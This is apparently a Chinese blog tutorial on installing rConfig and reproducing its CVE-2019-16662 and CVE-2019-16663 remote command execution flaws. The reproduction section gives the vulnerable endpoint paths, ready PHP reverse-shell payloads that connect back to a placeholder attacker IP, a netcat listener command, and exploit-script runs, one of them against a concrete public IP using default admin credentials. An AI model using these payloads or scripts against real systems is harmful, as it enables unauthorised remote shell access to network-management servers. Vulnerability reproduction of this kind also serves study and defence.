如何进行rConfig-CVE漏洞复现及环境搭建

2023-05-20,

今天就跟大家聊聊有关如何进行rConfig-CVE漏洞复现及环境搭建,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

rConfig是一个开放源代码的网络设备配置管理实用程序,网络工程师可以使用它来频繁获取其网络设备的配置快照。rConfig是唯一的,因为您选择要针对设备运行的命令。

只需使用要应用于设备类别的命令列表配置rConfig,然后将设备添加到该类别。创建一个计划任务,其余工作由rConfig完成。现在,rConfig版本3具有配置符合性管理实用程序,使您可以监视设备配置以符合策略。

一、环境搭建

rConfig安装

cd /home

curl -O https://www.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"

chmod +x install_rConfig.sh

./install_rConfig.sh

运行文件安装发现报错 我们打开源码看看为什么连接不上

结果发现会curl访问一下谷歌来判断是否有网 我们可以直接改成www.baidu.com,但是后面安装可能会刚问一写被墙的连接,所以我们保险起见,挂个代理把!!!我这里用的是proxychains4代理的我内网的一个ss。

然后就可以直接正常安装了。

安装完成之后会有一个centos7_postReboot.sh文件

我们接着运行一下 就可以看见已经安装完成了。剩下就去web页面配置了。

进入https://192.168.157.130/install页面进行后续安装

 

到此安装均已完成,默认账号密码为admin admin。

二、漏洞复现

rConfig 3.9.2及更低版本中的未经身份验证的命令执行漏洞。安装后,安装目录不会自动删除,这允许未经身份验证的用户通过ajaxServerSettingsChk.php文件作为Web服务器用户执行任意命令。

CVE-2019-16662 rConfig3.9.2远程命令执行漏洞复现:

为了直观,我自己在服务器上搭建了一个rConfig3.9.2系统,现在我们来抓包复现一下漏洞

我们将路径替换成存在漏的/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=

下面我们需要将命令执行一道url编码 然后再填入参数即可。

已经输出了我们的回显,现在我们来弹个shell试一下

将url编码;php -r '$sock=fsockopen("XX.XX.XX.XX",6633);exec("/bin/sh -i <&3 >&3 2>&3");'#

另一个外网服务器进行监听 nc -lvnp 6633

添加参数发送请求,可以看到已经反弹到shell了。

CVE-2019-16662Exp脚本利用

python rConfig-CVE-2019-16662.py https://154.221.20.69 XX.XX.XX.XX 6634

CVE-2019-16663 rConfig3.9.2远程命令执行漏洞复现

这个RCE需要身份验证才能执行,存在lib/crud/search.crud.php这个文件里。

登录成功之后进行抓包 替换成RCE的路径 将反弹shell的payload进行编码

""&&php -r '$sock=fsockopen("XX.XX.XX.XX",6635);exec("/bin/sh -i <&3 >&3 2>&3");'#

监听,反弹,成功

CVE-2019-16663 EXP利用

python rConfig-CVE-2019-16663.py https://154.221.20.69 admin admin IP 6636

CVE-2019-19509 rConfig3.9.3远程命令执行漏洞

由于3.9.3的安装包被官方删除和下架了,现在无法复现,但网上已有Exp。

看完上述内容,你们对如何进行rConfig-CVE漏洞复现及环境搭建有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注本站行业资讯频道,感谢大家的支持。

《如何进行rConfig-CVE漏洞复现及环境搭建.doc》

下载本文的Word格式文档,以方便收藏与打印。